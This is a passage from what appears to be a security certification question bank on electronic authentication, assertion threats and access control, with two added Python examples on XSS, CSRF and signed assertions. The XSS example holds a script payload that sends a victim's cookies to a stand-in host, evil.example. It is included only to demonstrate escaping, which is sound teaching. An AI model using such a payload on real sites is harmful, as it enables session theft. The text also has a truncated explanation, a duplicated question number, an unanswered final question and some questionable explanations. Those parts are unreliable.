C. An applicant applies to a registration authority (RA) to become a subscriber of a credential service provider (CSP) and, as a subscriber, is issued or registers a secret, called a token, and a credential (public key certificate) that binds the token to a name and other attributes that the RA has verified. The token and credential may be used in subsequent authentication events.
429
In the electronic authentication process, who performs the identity proofing? a. Subscriber b. Registration authority c. Applicant d. Credential service provider
B. The RA performs the identity proofing after registering the applicant with the CSP. An applicant becomes a subscriber of the CSP.
430
In electronic authentication, which of the following provides the authenticated information to the relying party for making access control decisions? a. Claimant/subscriber b. Applicant/subscriber c. Verifier/claimant d. Verifier/credential service provider
D. The relying party can use the authenticated information provided by the verifier/CSP to make access control decisions or authorization decisions. The verifier verifies that the claimant is the subscriber/applicant through an authentication protocol. The verifier passes on an assertion about the identity of the subscriber to the relying party. The verifier and the CSP may or may not belong to the same entity.
431
In electronic authentication, an authenticated session is established between which of the following? a. Claimant and the relying party b. Applicant and the registration authority c. Subscriber and the credential service provider d. Certifying authority and the registration authority
A. An authenticated session is established between the claimant and the relying party. Sometimes the verifier is also the relying party. The other three choices are incorrect because the correct answer is based on facts.
432
Under which of the following electronic authentication circumstances does the verifier need to directly communicate with the CSP to complete the authentication activity? a. Use of a digital certificate b. A physical link between the verifier and the CSP c. Distributed functions for the verifier, relying party, and the CSP d. A logical link between the verifier and the CSP
B. The use of digital certificates represents a logical link between the verifier and the CSP rather than a physical link. In some implementations, the verifier, relying party, and the CSP functions may be distributed and separated. The verifier needs to directly communicate with the CSP only when there is a physical link between them. In other words, the verifier does not need to directly communicate with the CSP for the other three choices.
433
In electronic authentication, who maintains the registration records to allow recovery of registration records? a. Credential service provider b. Subscriber c. Relying party d. Registration authority
A. The CSP maintains registration records for each subscriber to allow recovery of registration records. Other responsibilities of the CSP include the following: The CSP is responsible for establishing suitable policies for renewal and reissuance of tokens and credentials. During renewal, the usage or validity period of the token and credential is extended without changing the subscriber’s identity or token. During reissuance, a new credential is created for a subscriber with a new identity and/or a new token. The CSP is responsible for maintaining the revocation status of credentials and destroying the credential at the end of its life. For example, public key certificates are revoked using certificate revocation lists (CRLs) after the certificates are distributed. The verifier and the CSP may or may not belong to the same entity. The CSP is responsible for mitigating threats to tokens and credentials and managing their operations. Examples of threats include disclosure, tampering, unavailability, unauthorized renewal or reissuance, delayed revocation or destruction of credentials, and token use after decommissioning. The other three choices are incorrect because the (i) subscriber is a party who has received a credential or token from a CSP, (ii) relying party is an entity that relies upon the subscriber’s credentials or verifier’s assertion of an identity, and (iii) registration authority (RA) is a trusted entity that establishes and vouches for the identity of a subscriber to a CSP. The RA may be an integral part of a CSP, or it may be independent of a CSP, but it has a relationship to the CSP(s).
434
Which of the following is used in the unique identification of employees and contractors? a. Personal identity verification card token b. Passwords c. PKI certificates d. Biometrics
A. It is suggested that a personal identity verification (PIV) card token is used in the unique identification of employees and contractors. The PIV is a physical artifact (e.g., identity card or smart card) issued to an individual that contains stored identity credentials (e.g., photograph, cryptographic keys, or digitized fingerprint). The other three choices are used in user authenticator management, not in user identifier management. Examples of user authenticators include passwords, tokens, cryptographic keys, personal identification numbers (PINs), biometrics, public key infrastructure (PKI) certificates, and key cards. Examples of user identifiers include internal users, external users, contractors, guests, PIV cards, passwords, tokens, and biometrics.
435
In electronic authentication, which of the following produces an authenticator used in the authentication process? a. Encrypted key and password b. Token and cryptographic key c. Public key and verifier d. Private key and claimant
B. The token may be a piece of hardware that contains a cryptographic key that produces the authenticator used in the authentication process to authenticate the claimant. The key is protected by encrypting it with a password. The other three choices cannot produce an authenticator. A public key is the public part of an asymmetric key pair typically used to verify signatures or encrypt data. A verifier is an entity that verifies a claimant’s identity. A private key is the secret part of an asymmetric key pair typically used to digitally sign or decrypt data. A claimant is a party whose identity is to be verified using an authentication protocol.
436
In electronic authentication, shared secrets are based on which of the following? 1. Asymmetric keys 2. Symmetric keys 3. Passwords 4. Public key pairs a. 1 only b. 1 or 4 c. 2 or 3 d. 3 or 4
C. Shared secrets are based on either symmetric keys or passwords. The asymmetric keys are used in public key pairs. In a protocol sense, all shared secrets are similar and can be used in similar authentication protocols.
437
For electronic authentication, which of the following is not an example of assertions? a. Cookies b. Security assertions markup language c. X.509 certificates d. Kerberos tickets
C. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. Assertions may be digitally signed objects, or they may be obtained from a trusted source by a secure protocol. X.509 certificates are examples of electronic credentials, not assertions. Cookies, security assertions markup language (SAML), and Kerberos tickets are examples of assertions.
438
In electronic authentication, electronic credentials are stored as data in a directory or database. Which of the following refers to when the directory or database is untrusted? a. Self-authenticating b. Authentication to the relying party c. Authentication to the verifier d. Authentication to the credential service provider
A. When electronic credentials are stored in a directory or database server, the directory or database may be an untrusted entity because the data it supplies is self-authenticated. Alternatively, the directory or database server may be a trusted entity that authenticates itself to the relying party or verifier, but not to the CSP.
439
The correct flows and proper interactions between parties involved in electronic authentication include: a. Applicant⇒Registration Authority⇒Subscriber⇒Claimant b. Registration Authority⇒Applicant⇒Claimant⇒Subscriber c. Subscriber⇒Applicant⇒Registration Authority⇒Claimant d. Claimant⇒Subscriber⇒Registration Authority⇒Applicant
A. The correct flows and proper interactions between the various parties involved in electronic authentication include the following: An individual applicant applies to a registration authority (RA) through a registration process to become a subscriber of a credential service provider (CSP). The RA identity proofs that applicant. On successful identity proofing, the RA sends the CSP a registration confirmation message. A secret token and a corresponding credential are established between the CSP and the new subscriber for use in subsequent authentication events. The party to be authenticated is called a claimant (subscriber), and the party verifying that identity is called a verifier. The other three choices are incorrect be
440
In electronic authentication, which of the following represents the correct order of passing information about assertions? a. Subscriber⇒Credential Service Provider⇒Registration Authority b. Verifier⇒Claimant⇒Relying Party c. Relying Party⇒Claimant⇒Registration Authority d. Verifier⇒Credential Service Provider⇒Relying Party
B. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber (i.e., claimant). These assertions are used to pass information about the claimant from the verifier to a relying party. Assertions may be digitally signed objects or they may be obtained from a trusted source by a secure protocol. When the verifier and the relying parties are separate entities, the verifier conveys the result of the authentication protocol to the relying party. The object created by the verifier to convey the result of the authentication protocol is called an assertion. The credential service provider and the registration authority are not part of the assertion process.
441
From an access control viewpoint, which of the following are restricted access control models? 1. Identity-based access control policy 2. Attribute-based access control policy 3. Bell-LaPadula access control model 4. Domain type enforcement access control model a. 1 and 2 b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
C. Both the Bell-LaPadula model and the domain type enforcement model use restricted access control models because they are employed in safety-critical systems, such as military and airline systems. In a restricted model, the access control policies are expressed only once by a trusted principal and fixed for the life of the system. The identity-based and attribute-based access control policies are not based on restricted access control models but on identities and attributes, respectively.
442
Regarding password guessing and cracking threats, which of the following can help mitigate such threats? a. Passwords with low entropy, larger salts, and smaller stretching b. Passwords with high entropy, smaller salts, and smaller stretching c. Passwords with high entropy, larger salts, and larger stretching d. Passwords with low entropy, smaller salts, and larger stretching
C. Entropy in an information system is the measure of the disorder or randomness in the system. Passwords need high entropy because low-entropy passwords are more likely to be recovered through brute force attacks. Salting is the inclusion of a random value in the password hashing process that greatly decreases the likelihood of identical passwords returning the same hash. Larger salts effectively make the use of rainbow tables (lookup tables) by attackers infeasible. Many operating systems implement salted password hashing mechanisms to reduce the effectiveness of password cracking. Stretching, which is another technique to mitigate the use of rainbow tables, involves hashing each password and its salt thousands of times. Larger stretching makes the creation of rainbow tables more time consuming, which is not good for the attacker, but good for the attacked organization. Rainbow tables are lookup tables that contain precomputed password hashes. Therefore, passwords with high entropy, larger salts, and larger stretching can mitigate password guessing and cracking attempts by attackers.
443
In electronic authentication using tokens, the authenticator in the general case is a function of which of the following? a. Token secret and salt or challenge b. Token secret and seed or challenge c. Token secret and nonce or challenge d. Token secret and shim or challenge
C. The authenticator is generated through the use of a token. In the trivial case, the authenticator may be the token secret itself, where the token is a password. In the general case, an authenticator is generated by performing a mathematical function using the token secret and one or more optional token input values such as a nonce or challenge. A salt is a nonsecret value used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker. A seed is a starting value used to generate initialization vectors. A nonce is an identifier, a value, or a number used only once. Using a nonce as a challenge is a different requirement than using a random challenge because a nonce is predictable. A shim is a layer of host-based intrusion detection and prevention code placed between existing layers of code on a host that intercepts data and analyzes it.
444
In electronic authentication, using one token to gain access to a second token is called a: a. Single-token, multifactor scheme b. Single-token, single-factor scheme c. Multitoken, multifactor scheme d. Multistage authentication scheme
B. Using one token to gain access to a second token is considered a single token and a single factor scheme because all that is needed to gain access is the initial token. Therefore, when this scheme is used, the compound solution is only as strong as the token with the lowest assurance level. The other choices are incorrect because they are not applicable to the situation here.
445
As a part of centralized password management solutions, which of the following statements are true about password synchronization? 1. No centralized directory 2. No authentication server 3. Easier to implement than single sign-on technology 4. Less expensive than single sign-on technology a. 1 and 3 b. 2 and 4 c. 3 and 4 d. 1, 2, 3, and 4
D. A password synchronization solution takes a password from a user and changes the passwords on other resources to be the same as that password. The user then authenticates directly to each resource using that password. There is no centralized directory or authentication server performing authentication on behalf of the resources. The primary benefit of password synchronization is that it reduces the number of passwords that users need to remember; this may permit users to select stronger passwords and remember them more easily. Unlike single sign-on (SSO) technology, password synchronization does not reduce the number of times that users need to authenticate. Password synchronization solutions are typically easier, less expensive, and less secure to implement than SSO technologies.
446
As a part of centralized password management solutions, password synchronization becomes a single point-of-failure due to which of the following? a. It uses the same password for many resources. b. It can enable an attacker to compromise a low-security resource to gain access to a high-security resource. c. It uses the lowest common denominator approach to password strength. d. It can lead passwords to become unsynchronized.
A. All four choices are problems with password synchronization solutions. Because the same password is used for many resources, the compromise of any one instance of the password compromises all the instances, therefore becoming a single point-of-failure. Password synchronization forces the use of the lowest common denominator approach to password strength, resulting in weaker passwords due to character and length constraints. Passwords can become unsynchronized when a user changes a resource password directly with that resource instead of going through the password synchronization user interface. A password could also be changed due to a resource failure that requires restoration of a backup.
447
RuBAC is rule-based access control; RAdAC is risk adaptive access control; UDAC is user-directed access control; MAC is mandatory access control; ABAC is attribute-based access control; RBAC is role-based access control; IBAC is identity-based access control; and PBAC is policy-based access control. From an access control viewpoint, separation of domains is achieved through which of the following? a. RuBAC or RAdAC b. UDAC or MAC c. ABAC or RBAC d. IBAC or PBAC
C. Access control policy may benefit from separating Web services into various domains or compartments. This separation can be implemented in ABAC using resource attributes or through additional roles defined in RBAC. The other three choices cannot handle separation of domains.
448
Regarding local administrator password selection, which of the following can become a single point-of-failure? a. Using the same local root account password across systems b. Using built-in root accounts c. Storing local passwords on the local system d. Authenticating local passwords on the local system
A. Having a common password shared among all local administrator or root accounts on all machines within a network simplifies system maintenance, but it is a widespread security weakness, becoming a single point-of-failure. If a single machine is compromised, an attacker may recover the password and use it to gain access to all other machines that use the shared password. Therefore, it is good to avoid using the same local administrator or root account passwords across many systems. The other three choices, although risky in their own way, do not yield a single point-of-failure.
449
In electronic authentication, which of the following statements is not true about a multistage token scheme? a. An additional token is used for electronic transaction receipt. b. Multistage scheme assurance is higher than the multitoken scheme assurance using the same set of tokens. c. An additional token is used as a confirmation mechanism. d. Two tokens are used in two stages to raise the assurance level.
B. In a multistage token scheme, two tokens are used in two stages, and additional tokens are used for transaction receipt and confirmation mechanism to achieve the required assurance level. The level of assurance of the combination of the two stages can be no higher than that possible through a multitoken authentication scheme using the same set of tokens.
450
Online guessing is a threat to the tokens used for electronic authentication. Which of the following is a countermeasure to mitigate the online guessing threat? a. Use tokens that generate high entropy authenticators. b. Use hardware cryptographic tokens. c. Use tokens with dynamic authenticators. d. Use multifactor tokens.
A. Entropy is the uncertainty of a random variable. Tokens that generate high entropy authenticators prevent online guessing of secret tokens registered to a legitimate claimant and offline cracking of tokens. The other three choices cannot prevent online guessing of tokens or passwords.
451
Token duplication is a threat to the tokens used for electronic authentication. Which of the following is a countermeasure to mitigate the token duplication threat? a. Use tokens that generate high entropy authenticators. b. Use hardware cryptographic tokens. c. Use tokens with dynamic authenticators. d. Use multifactor tokens.
B. In token duplication, the subscriber’s token has been copied with or without the subscriber’s knowledge. A countermeasure is to use hardware cryptographic tokens that are difficult to duplicate. Physical security mechanisms can also be used to protect a stolen token from duplication because they provide tamper evidence, detection, and response capabilities. The other three choices cannot handle the token duplication problem.
452
Eavesdropping is a threat to the tokens used for electronic authentication. Which of the following is a countermeasure to mitigate the eavesdropping threat? a. Use tokens that generate high entropy authenticators. b. Use hardware cryptographic tokens. c. Use tokens with dynamic authenticators. d. Use multifactor tokens.
C. A countermeasure to mitigate the eavesdropping threat is to use tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator. The other choices are incorrect because they cannot provide dynamic authentication.
453
Identifier management is applicable to which of the following accounts? a. Group accounts b. Local user accounts c. Guest accounts d. Anonymous accounts
B. All users accessing an organization’s information systems must be uniquely identified and authenticated. Identifier management is applicable to local user accounts where the account is valid only on a local computer, and its identity can be traced to an individual. Identifier management is not applicable to shared information system accounts, such as group, guest, default, blank, anonymous, and nonspecific user accounts.
454
Phishing or pharming is a threat to the tokens used for electronic authentication. Which of the following is a countermeasure to mitigate the phishing or pharming threat? a. Use tokens that generate high entropy authenticators. b. Use hardware cryptographic tokens. c. Use tokens with dynamic authenticators. d. Use multifactor tokens.
C. A countermeasure to mitigate the phishing or pharming threat is to use tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator. The other choices are incorrect because they cannot provide dynamic authentication. Phishing is tricking individuals into disclosing sensitive personal information through deceptive computer-based means. Phishing attacks use social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials. It involves Internet fraudsters who send spam or pop-up messages to lure personal information (e.g., credit card numbers, bank account information, social security numbers, passwords, or other sensitive information) from unsuspecting victims. Pharming is misdirecting users to fraudulent websites or proxy servers, typically through DNS hijacking or poisoning.
455
Theft is a threat to the tokens used for electronic authentication. Which of the following is a countermeasure to mitigate the theft threat? a. Use tokens that generate high entropy authenticators. b. Use hardware cryptographic tokens. c. Use tokens with dynamic authenticators. d. Use multifactor tokens.
D. A countermeasure to mitigate the threat of token theft is to use multifactor tokens that need to be activated through a PIN or biometric. The other choices are incorrect because they cannot provide multifactor tokens.
456
Social engineering is a threat to the tokens used for electronic authentication. Which of the following is a countermeasure to mitigate the social engineering threat? a. Use tokens that generate high entropy authenticators. b. Use hardware cryptographic tokens. c. Use tokens with dynamic authenticators. d. Use multifactor tokens.
C. A countermeasure to mitigate the social engineering threat is to use tokens with dynamic authenticators where knowledge of one authenticator does not assist in deriving a subsequent authenticator. The other choices are incorrect because they cannot provide dynamic authentication.
457
In electronic authentication, which of the following is used to verify proof-of-possession of registered devices or identifiers? a. Lookup secret token b. Out-of-band token c. Token lock-up feature d. Physical security mechanism
B. Out-of-band tokens can be used to verify proof-of-possession of registered devices (e.g., cell phones) or identifiers (e.g., e-mail IDs). The other three choices cannot verify proof-of-possession. Lookup secret tokens can be copied. Some tokens can lock up after a number of repeated failed activation attempts. Physical security mechanisms can be used to protect a stolen token from duplication because they provide tamper evidence, detection, and response capabilities.
458
In electronic authentication, which of the following are examples of weakly bound credentials? 1. Unencrypted password files 2. Signed password files 3. Unsigned public key certificates 4. Signed public key certificates a. 1 only b. 1 and 3 c. 1 and 4 d. 2 and 4
B. Unencrypted password files and unsigned public key certificates are examples of weakly bound credentials. The association between the identity and the token within a weakly bound credential can be readily undone, and a new association can be readily created. For example, a password file is a weakly bound credential because anyone who has “write” access to the password file can potentially update the association contained within the file.
459
In electronic authentication, which of the following are examples of strongly bound credentials? 1. Unencrypted password files 2. Signed password files 3. Unsigned public key certificates 4. Signed public key certificates a. 1 only b. 1 and 3 c. 1 and 4 d. 2 and 4
D. Signed password files and signed public key certificates are examples of strongly bound credentials. The association between the identity and the token within a strongly bound credential cannot be easily undone. For example, a digital signature binds the identity to the public key in a public key certificate; tampering with the certificate is easily detected through signature verification.
460
Authorization controls are a part of which of the following? a. Directive controls b. Preventive controls c. Detective controls d. Corrective controls
B. Authorization controls such as access control matrices and capability tests are a part of preventive controls because they block unauthorized access. Preventive controls deter security incidents from happening in the first place. Directive controls are broad-based controls to handle security incidents, and they include management’s policies, procedures, and directives. Detective controls enhance security by monitoring the effectiveness of preventive controls and by detecting security incidents where preventive controls were circumvented. Corrective controls are procedures to react to security incidents and to take remedial actions on a timely basis. Corrective controls require proper planning and preparation as they rely more on human judgment.
461
In electronic authentication, after a credential has been created, which of the following is responsible for maintaining the credential in storage? a. Verifier b. Relying party c. Credential service provider d. Registration authority
C. The credential service provider (CSP) is responsible for maintaining the credential in storage after it has been created. The verifier and the CSP may or may not belong to the same entity. The other three choices are incorrect: the verifier checks the token at authentication time, the relying party consumes the resulting assertion, and the registration authority vouches for the applicant’s identity at enrollment; none of them stores the credential.
462
Which of the following is the correct definition of privilege management? a. Privilege management = Entity attributes + Entity policies b. Privilege management = Attribute management + Policy management c. Privilege management = Resource attributes + Resource policies d. Privilege management = Environment attributes + Environment policies
B. Privilege management is defined as a process that creates, manages, and stores the attributes and policies needed to establish criteria that can be used to decide whether an authenticated entity’s request for access to some resource should be granted. Privilege management is conceptually split into two parts: attribute management and policy management. The attribute management is further defined in terms of entity attributes, resource attributes, and environment attributes. Similarly, the policy management is further defined in terms of entity policies, resource policies, and environment policies.
463
The extensible access control markup language (XACML) does not define or support which of the following? a. Trust management b. Privilege management c. Policy language d. Query language
A. The extensible access control markup language (XACML) is a standard for managing access control policy and supports the enterprise-level privilege management. It includes a policy language and a query language. However, XACML does not define authority delegation and trust management.
464
For intrusion detection and prevention system (IDPS) security capabilities, which of the following prevention actions should be performed first to reduce the risk of inadvertently blocking benign activity? 1. Alert enabling capability. 2. Alert disabling capability. 3. Sensor learning mode ability. 4. Sensor simulation mode ability. a. 1 and 2 b. 1 and 3 c. 2 and 4 d. 3 and 4
D. Some intrusion detection and prevention system (IDPS) sensors have a learning mode or simulation mode that suppresses all prevention actions and instead indicates when a prevention action should have been performed. This ability enables administrators to monitor and fine-tune the configuration of the prevention capabilities before enabling prevention actions, which reduces the risk of inadvertently blocking benign activity. Alerts can be enabled or disabled later.
465
In the electronic authentication process, which of the following is weakly resistant to man-in-the-middle (MitM) attacks? a. Account lockout mechanism b. Random data c. Sending a password over server authenticated TLS d. Nonce
C. A protocol is said to have weak resistance to MitM attacks if it provides a mechanism for the claimant to determine whether he is interacting with the real verifier, but still leaves the opportunity for the nonvigilant claimant to reveal a token authenticator to an unauthorized party that can be used to masquerade as the claimant to the real verifier. For example, sending a password over server authenticated transport layer security (TLS) is weakly resistant to MitM attacks. The browser enables the claimant to verify the identity of the verifier; however, if the claimant is not sufficiently vigilant, the password will be revealed to an unauthorized party who can abuse the information. The other three choices do not address MitM attacks, but they strengthen other parts of the electronic authentication process. An account lockout mechanism is implemented on the verifier to prevent online guessing of passwords by an attacker who tries to authenticate as a legitimate claimant. Random data and nonces give each protocol run a fresh, unpredictable value so that a captured authenticator cannot be replayed.
466
In the electronic authentication process, which of the following is strongly resistant to man-in-the-middle (MitM) attacks? a. Encrypted key exchange (EKE) b. Simple password exponential key exchange (SPEKE) c. Secure remote password protocol (SRP) d. Client authenticated transport layer security (TLS)
D. A protocol is said to be highly resistant to man-in-the-middle (MitM) attacks if it does not enable the claimant to reveal, to an attacker masquerading as the verifier, information (e.g., token secrets and authenticators) that the attacker can use to masquerade as the true claimant to the real verifier. In client authenticated transport layer security (TLS), the browser and the Web server authenticate one another using public key infrastructure (PKI) credentials, and the client’s private key never leaves the client, so the protocol is strongly resistant to MitM attacks. Note that EKE, SPEKE, and SRP are zero-knowledge password protocols (password-authenticated key exchanges) in which the claimant is authenticated without disclosing the token secret, so an impostor verifier learns nothing it can later present to the real verifier; by the definition above they also provide strong MitM resistance, and this question keys on client authenticated TLS as the PKI-based example.
467
In electronic authentication, which of the following controls is effective against cross site scripting (XSS) vulnerabilities? a. Sanitize inputs to make them nonexecutable. b. Insert random data into any linked uniform resource locator. c. Insert random data into a hidden field. d. Use a per-session shared secret.
A. In a cross site scripting (XSS) vulnerability, an attacker may use an extensible markup language (XML) injection to perform the equivalent of an XSS, in which requesters of a valid Web service have their requests transparently rerouted to an attacker-controlled Web service that performs malicious operations. To prevent XSS vulnerabilities, the relying party should sanitize inputs from claimants or subscribers to ensure they are not executable, or at the very least not malicious, before displaying them as content to the subscriber’s browser. The other three choices are controls against cross site request forgery and session hijacking, not against XSS.
468
In electronic authentication, which of the following controls is not effective against a cross site request forgery (CSRF) attack? a. Sanitize inputs to make them nonexecutable. b. Insert random data into any linked uniform resource locator. c. Insert random data into a hidden field. d. Generate a per-session shared secret.
A. A cross site request forgery (CSRF) is a type of session hijacking attack where a malicious website contains a link to the URL of the legitimate relying party. Web applications, even those protected by secure sockets layer/transport layer security (SSL/TLS), can still be vulnerable to the CSRF attack. One control against CSRF is to insert random data, supplied by the relying party, into any linked uniform resource locator with side effects and into a hidden field within any form on the relying party’s website. Generating a per-session shared secret is effective against session hijacking generally. Sanitizing inputs to make them nonexecutable is effective against cross site scripting (XSS) attacks, not CSRF attacks.
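The XSS and CSRF controls from the two questions above, side by side, as an added Python example that is not part of the original question set: a vulnerable renderer next to its sanitized form, and a CSRF token (random data from the relying party, bound to the session) placed in a hidden field and in a side-effecting link, then checked on the state-changing request. The key, session identifiers, handler and payload are constructed for illustration.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import urlencode

# Hypothetical relying-party key, generated at startup and never sent to the browser.
SERVER_KEY = secrets.token_bytes(32)


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: subscriber-supplied text is interpolated into the page verbatim, so a
    comment containing <script> executes in every other subscriber's browser (XSS)."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Hardened: the input is escaped so the browser displays it as text rather than markup."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


def csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Random data supplied by the relying party and bound to the subscriber's session:
    token = nonce . HMAC(key, session_id || nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    """A forged token, or one minted for the attacker's own session, fails this check."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def hidden_field(session_id: str) -> str:
    """The token embedded in a hidden form field (the form itself is still served over TLS)."""
    return f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'


def link_with_token(base_url: str, session_id: str) -> str:
    """The token appended to a linked URL that has side effects (e.g. a 'delete' link)."""
    return f"{base_url}?{urlencode({'csrf_token': csrf_token(session_id)})}"


def handle_transfer(session_id: str, form: dict) -> tuple:
    """State-changing request handler. A request forged from a malicious site carries the
    victim's session cookie but no token for that session, so it is rejected."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "CSRF token missing or invalid"
    return 200, "transfer accepted"


if __name__ == "__main__":
    payload = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    print(render_comment_unsafe(payload))
    print(render_comment_safe(payload))
    victim = "session-of-alice"
    print(handle_transfer(victim, {"amount": "100"}))                                  # 403
    print(handle_transfer(victim, {"csrf_token": csrf_token("session-of-mallory")}))   # 403
    print(handle_transfer(victim, {"csrf_token": csrf_token(victim)}))                 # 200
```

Binding the token to the session with an HMAC means the server stores nothing per token, and a token the attacker obtains from their own session is useless against the victim’s; sanitizing output, as the XSS answer says, is what keeps an attacker from reading the hidden field in the first place.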
469
In electronic authentication, which of the following can mitigate the threat of assertion manufacture and/or modification? a. Digital signature and TLS/SSL b. Timestamp and short lifetime of validity c. Digital signature with a key supporting nonrepudiation d. HTTP and TLS
A. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. To mitigate the threat of assertion manufacture and/or modification, the assertion may be digitally signed by the verifier and the assertion sent over a protected channel such as TLS/SSL. The other three choices are incorrect because they are not applicable to the situation here.
470
In electronic authentication, which of the following can mitigate the threat of assertion reuse? a. Digital signature and TLS/SSL b. Timestamp and short lifetime of validity c. Digital signature with a key supporting nonrepudiation d. HTTP and TLS
B. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. To mitigate the threat of assertion reuse, the assertion should include a timestamp and a short lifetime of validity. The other three choices are incorrect because they are not applicable to the situation here.
471
In electronic authentication, which of the following can mitigate the threat of assertion repudiation? a. Digital signature and TLS/SSL b. Timestamp and short lifetime of validity c. Digital signature with a key supporting nonrepudiation d. HTTP and TLS
C. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. To mitigate the threat of assertion repudiation, the assertion may be digitally signed by the verifier using a key that supports nonrepudiation. The other three choices are incorrect because they are not applicable to the situation here.
472
In electronic authentication, which of the following can mitigate the threat of assertion substitution? a. Digital signature and TLS/SSL b. Timestamp and short lifetime of validity c. Digital signature with a key supporting nonrepudiation d. HTTP and TLS
D. An assertion is a statement from a verifier to a relying party that contains identity information about a subscriber. In assertion substitution, an attacker tries to pair an assertion with a request other than the one it answers. To mitigate this threat, the HTTP request/response pairing keeps each assertion bound to the request that produced it, and TLS protects the channel so that malicious reordering or injection of messages is detected and rejected. The other three choices are incorrect because they are not applicable to the situation here.
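The four assertion threats above (manufacture/modification, reuse, repudiation, substitution) and the earlier weakly versus strongly bound credential questions all come down to what a signature, a timestamp and a request binding each buy you. As an added Python example, not part of the original question set, here is a verifier that issues signed assertions and a relying party that checks them; the shared key, claim names (sub, aud, irt, iat, exp) and the 60-second lifetime are assumptions for illustration.

```python
import hashlib
import hmac
import json
import secrets

# Hypothetical key shared by the verifier (issuer) and the relying party; constructed for the example.
ASSERTION_KEY = secrets.token_bytes(32)


def canonical(claims: dict) -> bytes:
    """Deterministic serialization so issuer and relying party sign/verify identical bytes."""
    return json.dumps(claims, sort_keys=True, separators=(",", ":")).encode()


def sign(claims: dict, key: bytes) -> str:
    return hmac.new(key, canonical(claims), hashlib.sha256).hexdigest()


def issue_assertion(subject: str, audience: str, in_response_to: str, now: int,
                    lifetime: int = 60, key: bytes = ASSERTION_KEY) -> dict:
    """Verifier side. The signature binds identity to claims (strongly bound credential;
    defeats manufacture/modification), iat/exp give a timestamp and short validity
    (defeats reuse), and irt binds the assertion to one request (defeats substitution)."""
    claims = {"sub": subject, "aud": audience, "irt": in_response_to,
              "iat": now, "exp": now + lifetime}
    return {"claims": claims, "sig": sign(claims, key)}


def verify_assertion(assertion: dict, expected_audience: str, expected_request_id: str,
                     now: int, key: bytes = ASSERTION_KEY) -> tuple:
    """Relying-party side. Returns (accepted, reason); the signature is checked before any
    claim is trusted, so a tampered claim cannot influence the later checks."""
    claims = assertion.get("claims", {})
    if not hmac.compare_digest(assertion.get("sig", ""), sign(claims, key)):
        return False, "manufactured or modified"
    if claims.get("aud") != expected_audience:
        return False, "wrong audience"
    if claims.get("irt") != expected_request_id:
        return False, "substituted: not the response to our request"
    if not claims.get("iat", 0) <= now <= claims.get("exp", -1):
        return False, "expired or not yet valid (reuse)"
    return True, "ok"


def weakly_bound_record(subject: str, public_key: str) -> dict:
    """An unsigned association (like an unencrypted password file entry or an unsigned
    certificate): anyone who can write the record can silently change the binding."""
    return {"sub": subject, "key": public_key}


def strongly_bound_record(subject: str, public_key: str, key: bytes = ASSERTION_KEY) -> dict:
    """The same association with a signature over it: a changed binding fails verification."""
    rec = {"sub": subject, "key": public_key}
    return {"record": rec, "sig": sign(rec, key)}


def binding_intact(record: dict, key: bytes = ASSERTION_KEY) -> bool:
    return hmac.compare_digest(record["sig"], sign(record["record"], key))


if __name__ == "__main__":
    a = issue_assertion("alice", "rp.example", "req-1", now=1_000)
    print(verify_assertion(a, "rp.example", "req-1", now=1_010))      # (True, 'ok')
    print(verify_assertion(a, "rp.example", "req-1", now=1_100))      # expired: replayed assertion
    print(verify_assertion(a, "rp.example", "req-2", now=1_010))      # substituted for another request
    forged = {"claims": dict(a["claims"], sub="mallory"), "sig": a["sig"]}
    print(verify_assertion(forged, "rp.example", "req-1", now=1_010))  # modified
    rec = strongly_bound_record("alice", "PUBKEY-A")
    rec["record"]["key"] = "PUBKEY-MALLORY"
    print(binding_intact(rec))                                          # False
```

One caveat the repudiation question depends on: an HMAC proves integrity and origin only within the issuer/relying-party pair, because both hold the key and either could have produced the tag. Nonrepudiation needs the verifier to sign with a private key it alone holds (an asymmetric signature such as RSA or ECDSA, as real SAML and OpenID Connect deployments do); the check structure above stays the same, only `sign` changes.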
473
In mobile device authentication, password and personal identification number (PIN) authentication is an example of which of the following? a. Proof-by-possession b. Proof-by-knowledge c. Proof-by-property d. Proof-of-origin
B. Proof-by-knowledge is where a claimant authenticates his identity to a verifier by the use of a password or PIN (i.e., something you know) that he has knowledge of. Proof-by-possession and proof-by-property, along with proof-by-knowledge, are used in mobile device authentication and robust authentication. Proof-of-origin is the basis to prove an assertion. For example, a private signature key is used to generate digital signatures as a proof-of-origin.
473
Serious vulnerabilities exist when: a. An untrusted individual has been granted an unauthorized access. b. A trusted individual has been granted an authorized access. c. An untrusted individual has been granted an authorized access. d. A trusted individual has been granted an unauthorized access.
A. Serious vulnerabilities result when an untrusted individual is granted unauthorized access to a system: neither the individual nor the access has been vetted. Granting unauthorized access is riskier than granting authorized access, and an untrusted individual is riskier than a trusted one, so the combination of the two is the worst case. Both trust and authorization are important to minimize vulnerabilities. The other three choices are incorrect because at least one of the two safeguards is in place in each of them.
474
In mobile device authentication, fingerprint authentication is an example of which of the following? a. Proof-by-possession b. Proof-by-knowledge c. Proof-by-property d. Proof-of-origin
